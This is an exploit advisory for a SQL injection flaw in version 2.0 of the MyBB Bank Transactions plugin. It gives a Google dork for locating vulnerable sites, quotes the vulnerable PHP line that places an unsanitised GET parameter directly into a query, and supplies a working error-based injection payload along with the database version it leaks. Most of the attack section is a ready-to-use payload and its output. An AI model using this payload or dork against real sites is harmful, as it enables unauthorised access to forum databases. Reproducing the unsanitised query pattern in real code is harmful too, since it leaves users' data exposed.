MyBB Bank Transactions plugin version 2.0 suffers from a remote SQL injection vulnerability.
b5222aa3da9434e51331f92cb0cbda2b2fa97e5fbd76eddfa0fe0fd087c25916
# Exploit Title: MyBB Bank Transactions Plugin SQL Injection
# Google Dork: inurl:bank.php?transactions=
# Date: 13.12.2012
# Exploit Author: limb0
# Vendor Homepage: http://mods.mybb.com/view/transactions
# Software Link: www.kingofpersia.ir
# Version: 2.0
# Category:Web Security
# Tested on: Linux
================================SQLi==============================
Installation:
1:Download the plugin and copy-paste the files on the right directory
2:Activate the plugin
(On this step maybe you will get an error like:
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=utf8' at line 7
This is because of the plugin.Open the bank.php from the /inc/plugins directory and delete this part from every query:
"TYPE=MyISAM DEFAULT CHARSET=utf8".When you click on Activate again everything should work right)
------------------------------------------------------------------
This vulnerability exists on bank.php
Vulnerable lines
$uid=$_GET['transactions'];
$T_ID=1;
$T_ufetch=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid=$uid ");
-------------------------------------------------------------------
Instructions:
Go to: /bank.php?transactions=[SQLi]
example:
/bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
Result:
1062 - Duplicate entry '5.5.27~1' for key 'group_key'
Proof:http://postimage.org/image/i34m16ejj/